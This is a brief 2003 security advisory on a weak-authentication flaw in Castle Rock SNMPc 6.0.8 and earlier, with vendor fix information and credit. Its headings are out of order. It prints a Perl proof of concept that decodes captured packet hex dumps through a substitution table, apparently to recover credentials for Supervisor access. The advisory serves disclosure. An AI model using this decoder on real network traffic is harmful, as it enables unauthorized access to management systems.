Reported
August 27, 2003 by Alexander V. Nickolenko.
VERSIONS
AFFECTED
Castle Rock SNMPc 6.0.8
and earlier
DESCRIPTION
DEMONSTRATION
The discoverer posted the following code as proof of concept:
#!/usr/bin/perl
$str='.YZ\[\\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz\{|\}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-./
!"#$%&\'................................................................................................................................';
while(<>)
\{
$s="";
if(/^0130 /)\{
GETIT: \{
do
\{
s/^0130 00 00 // if /^0130/;
s/^xdigit:\{4\} //;
s/ .*$//ms;
$s=$s." ".$_;
last GETIT if ($s =~ / 00/);
\} while (<>)
\};
$s=~s/ 00.*$//ms;
$s=~s/ (xdigit:\{2\}) (xdigit:\{2\})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1)
/ige;
$s=~s/ (xdigit:\{2\})/ chr(hex($1)) /ige;
print ":$s:\n";
\}
\}
VENDOR
RESPONSE
CREDIT
A vulnerability in Castle Rock SNMPc 6.0.8 and earlier can let any remote user gain Supervisor access to the vulnerable system. This vulnerability is a result of a weak authentication protocol.
Castle Rock has released fixes for versions 6.0.5 and 6.0.8 and a full version fix for release 5.1.
Discovered by
Alexander V. Nickolenko.
Weak Authentication in SNMPc
0 comments
Hide comments